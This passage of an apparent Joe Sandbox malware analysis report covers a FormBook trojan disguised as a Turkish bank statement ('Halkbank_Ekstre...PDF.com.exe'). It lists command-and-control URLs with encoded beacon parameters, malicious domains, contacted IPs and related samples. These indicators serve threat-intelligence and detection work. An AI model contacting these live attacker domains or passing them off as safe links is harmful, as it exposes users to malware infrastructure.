                            http://www.genuineinsights.cloud/ghii/?1LM=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5RnkbE2XBG6Jig==&kTj=94JTJ5e-oGtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.octohoki.net/ghii/?1LM=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIleqyuhYHktxRXxg==&kTj=94JTJ5e-oGtrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.fluxgreenn.spaceexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/chrome_newtabcolorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                              		high
                              http://www.cutgang.net/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=-912K03JO.5.drfalse
                                		high
                                http://www.hubyazilim.com/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.sem-jobs.com/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://search.yahoo.com?fr=crmas_sfpfcolorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                                  		high
                                  http://www.ixirwholesale.xyz/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ladybillplanet.com/ghii/?1LM=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lCcolorcpl.exe, 00000005.00000002.570570309.0000000005F50000.00000004.10000000.00040000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.cutgang.netexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.de-nagel.com/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.cutgang.net/ghii/?1LM=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8hcolorcpl.exe, 00000005.00000002.571083192.0000000007C19000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.568364047.000000000357A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.nortonseecurity.com/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.de-nagel.com/hexplorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.octohoki.netexplorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.assilajamiart.com/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.wenzid4.topexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.7dkjhk.comexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.de-nagel.comexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ladybillplanet.comexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.assilajamiart.comexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.searchvity.com/?dn=colorcpl.exe, 00000005.00000002.570570309.0000000005C2C000.00000004.10000000.00040000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  		unknown
                                  http://www.bemmulher.online/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.320111169.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.bemmulher.onlineexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocolorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                                      		high
                                      http://www.7dkjhk.com/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.sem-jobs.comexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.yeah-go.com/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.energybig.xyzexplorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-912K03JO.5.drfalse
                                        		high
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcolorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorErrorHalkbank_Ekstre_20191102_073809_405251-PDF.com.exefalse
                                            		high
                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=colorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                                              		high
                                              https://ac.ecosia.org/autocomplete?q=-912K03JO.5.drfalse
                                                		high
                                                https://search.yahoo.com?fr=crmas_sfpcolorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                                                  		high
                                                  http://www.genuineinsights.cloudexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  http://www.wenzid4.top/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.searchvity.com/colorcpl.exe, 00000005.00000002.570570309.0000000005C2C000.00000004.10000000.00040000.00000000.sdmptrue
                                                  • URL Reputation: malware
                                                  		unknown
                                                  http://www.fluxgreenn.space/ghii/explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ixirwholesale.xyzexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.yeah-go.comexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-912K03JO.5.drfalse
                                                    		high
                                                    http://www.hubyazilim.comexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.nortonseecurity.comexplorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    66.235.200.146
                                                    		ladybillplanet.comUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    66.96.162.149
                                                    		www.genuineinsights.cloudUnited States
                                                    		29873BIZLAND-SDUStrue
                                                    107.148.8.96
                                                    		www.wenzid4.topUnited States
                                                    		54600PEGTECHINCUStrue
                                                    194.102.227.30
                                                    		cutgang.netRomania
                                                    		12302VODAFONE_ROCharlesdeGaullenr15ROtrue
                                                    198.54.117.212
                                                    		parkingpage.namecheap.comUnited States
                                                    		22612NAMECHEAP-NETUSfalse
                                                    184.94.215.91
                                                    		www.energybig.xyzUnited States
                                                    		394896VXCHNGE-NC01UStrue

                                                    General Information

                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                    Analysis ID:811929
                                                    Start date and time:2023-02-20 11:22:03 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 11m 10s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:10
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample file name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@10/5@8/6
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 83.7% (good quality ratio 78.4%)
                                                    • Quality average: 77.8%
                                                    • Quality standard deviation: 30.1%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 79
                                                    • Number of non-executed functions: 118
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    11:24:00API Interceptor456x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    66.235.200.146T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • www.ladybillplanet.com/ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEKoXZLS1zEAfoQ==&9WI6t=QaRcz
                                                    Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • www.ladybillplanet.com/ghii/?gXaj8V=nNwsU5RDSztrDyxRG6fOt7xC4ovPWgXbvYOj2DqB/Q3esj8ZmeFlGSP1p8lC+bcuH8jypYjqHnnMah8No3XkEI0UYJqWzEMypQ==&D-=o7lM_tn4_0HKLAP
                                                    T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • www.ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XkProQXaSL0hAuoA==&IlOzNN=EyIBgfI12Z
                                                    captain.exeGet hashmaliciousFormBookBrowse
                                                    • www.ladybillplanet.com/ghii/?5B=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEKoXZLS1zEAfoQ==&Z-y-ON=FXxQJAlmPf
                                                    http___185.246.221.143_pl2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.yaman-style.com/d06c/?mHC=gEJ54mFIwRh66Ae6L7uGyLYGbeEQfdX/4cHILN4O14RF/7dAwvjZyXpBwE928WLZwse/&7n=7nWd7RmXyP1LGne
                                                    nXfhmoy82p.exeGet hashmaliciousFormBookBrowse
                                                    • www.adattatoreit.com/m8on/?JBZ8=tALdn/sPTp4U4YS3OCFDtGFGnrRVrAVtTe8mQyWGdpVxOyMH4EszkIkYcOXeyZElzKa8XQc1mLvwfdFuiif4BOKPTFRhIgwAZXK5koi8yaz7&j6A=T45T1VQPUrjXf2Op
                                                    H4oimu4PlB.exeGet hashmaliciousFormBookBrowse
                                                    • www.flachick.com/aoj8/?y8Q=Wr9Dm/5SzM41BnlvUv1k3Y7jKSw9TQocHWKX+hoCdrCgVTGjQgdGKKK3lW4KeS50fuEi1WQ8xU7Scka8099Dik7n7alAjpMOOutQUsEftEWN&i2=Phup26RPJ8Nd8Zg
                                                    FEI9BuaEmY.exeGet hashmaliciousFormBookBrowse
                                                    • www.yourcustommattress.co.uk/8awd/
                                                    Forwarded.exeGet hashmaliciousFormBookBrowse
                                                    • www.iceboring.com/hy3h/?s6-=08HH0NEmiNcN62W2MNEFKyqBvrt6Dxuxurp87k8T2npS1Cca/SILOQgoLROT1jik7ir4qizsjIR0SPe+HTHY2MS2FT7bqA8m9g==&Kxl0i=6lGLHtnpT
                                                    qEHhJqcore.exeGet hashmaliciousFormBookBrowse
                                                    • www.iceboring.com/fuyb/?S4=u2JHH4d8zh-de&hZRh9l-=wqXCX8OhtvSlHAZwOfBWnOfZ/R2p/G6DdWl1tzf/7jxUDzpEBU+k0liEEKvagZgTd6jKHbMDh7HhDdjpxPwHtUvgTfkP1qfC5w==
                                                    go8foToOYf.exeGet hashmaliciousFormBookBrowse
                                                    • www.iceboring.com/fuyb/?4hLpo=FBZdp6&jL0=wqXCX8OhtvSlHAZwOfBWnOfZ/R2p/G6DdWl1tzf/7jxUDzpEBU+k0liEEKvagZgTd6jKHbMDh7HhDdjpxPwCk2HXZOkxzIbj4g==
                                                    3ieckSO4EL.exeGet hashmaliciousFormBookBrowse
                                                    • www.iceboring.com/fuyb/?4hDtov1=wqXCX8OhtvSlHAZwOfBWnOfZ/R2p/G6DdWl1tzf/7jxUDzpEBU+k0liEEKvagZgTd6jKHbMDh7HhDdjpxPwCk2HXZOkxzIbj4g==&a2MTP4=yHAl2XfPqvFt4j
                                                    FedEX.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.sbrco.net/cour/?a8_DM4yx=5K4yHsJ9E8OCo4lpPX/pgOMJL6h904cpHq/DKl+JExs5qHkrFnD9qnICzmg14sLIDD0twRyxTlpGUGv45uAz9uCNeenKauztFA==&FFN0=2dRlFh_p
                                                    kopia p#U0142atno#U015bci.exeGet hashmaliciousFormBookBrowse
                                                    • www.t4yfrance.com/dwdp/?Ploxn=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQ25tTkvl4SQxCA==&b2Mt=Q4SXxN_hK
                                                    44620.exeGet hashmaliciousFormBookBrowse
                                                    • www.t4yfrance.com/dwdp/?y8=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRJIm9xNUft4g0EErls9LM3FR8X&yDKTI=PXyxUJshCVDXBZtP
                                                    0m1W0nDBF5.imgGet hashmaliciousFormBookBrowse
                                                    • www.t4yfrance.com/dwdp/?5jk=U2Jpt&7nrhV=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQ25tTkvl4SQxCA==
                                                    AnOqqu1435.imgGet hashmaliciousFormBookBrowse
                                                    • www.t4yfrance.com/dwdp/?DR-P=VXa0gzFpvDy&-Zn=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQ25tTkvl4SQxCA==
                                                    PO#160942.exeGet hashmaliciousFormBookBrowse
                                                    • www.iceboring.com/fuyb/?RnKPtJ=wqXCX8OhtvSlHAZwOfBWnOfZ/R2p/G6DdWl1tzf/7jxUDzpEBU+k0liEEKvagZgTd6jKHbMDh7HhDdjpxPwCk2HXZOkxzIbj4g==&5jU=h4zTzf
                                                    payment receipt.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.sbrco.net/cour/?w0DLPNd=5K4yHsJ9E8OCo4lpPX/pgOMJL6h904cpHq/DKl+JExs5qHkrFnD9qnICzmg14sLIDD0twRyxTlpGUGv45uAz9uCNeenKauztFA==&9rFHcZ=3fudcX1
                                                    Musterkatalog 2022.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.t4yfrance.com/dwdp/?fZz=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQwl8NX3l5SYpCA==&-Zl=7nH43

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.genuineinsights.cloudT.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    captain.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    file.exeGet hashmaliciousAgentTesla, FormBookBrowse
                                                    • 66.96.162.149
                                                    0900664 MOHS Tender..jsGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSJWKtbC1vxC.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    OC1e8Xyj0P.exeGet hashmaliciousFormBookBrowse
                                                    • 172.67.144.31
                                                    dutch_94854_0293_invoice_30495.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.14
                                                    https://edited.com/Get hashmaliciousUnknownBrowse
                                                    • 104.16.168.82
                                                    DISCHG.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    doc20230213-01976520230110105630-.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.159.128.233
                                                    doc20230216-0197652023011010563-.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.159.135.232
                                                    QcoZmWXTxJ.exeGet hashmaliciousDanaBot, Djvu, SmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    FedEx Receipt_1022355161763.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 162.159.135.232
                                                    wQgz3XgUTu.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    BxlvWO2ADY.exeGet hashmaliciousSmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    r69q88yFsf.exeGet hashmaliciousDjvu, Fabookie, ManusCrypt, SmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    lp4mPmFPdO.exeGet hashmaliciousSmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    mstD4W9jcF.exeGet hashmaliciousSmokeLoaderBrowse
                                                    • 188.114.97.3
                                                    aRRaCVg5D4.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    GqWqSusfJ9.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    h7L8D8I7BM.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                    • 188.114.97.3
                                                    EgNFnNnFF1.exeGet hashmaliciousDanaBot, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    qPStf4qshA.exeGet hashmaliciousDanaBot, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    2R0eTr71uQ.exeGet hashmaliciousDanaBot, Djvu, Fabookie, ManusCrypt, RedLine, SmokeLoaderBrowse
                                                    • 188.114.96.3
                                                    BIZLAND-SDUSFedEx Express AWB#5305323204643.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.147.160
                                                    T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
                                                    Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                    • 66.96.162.149
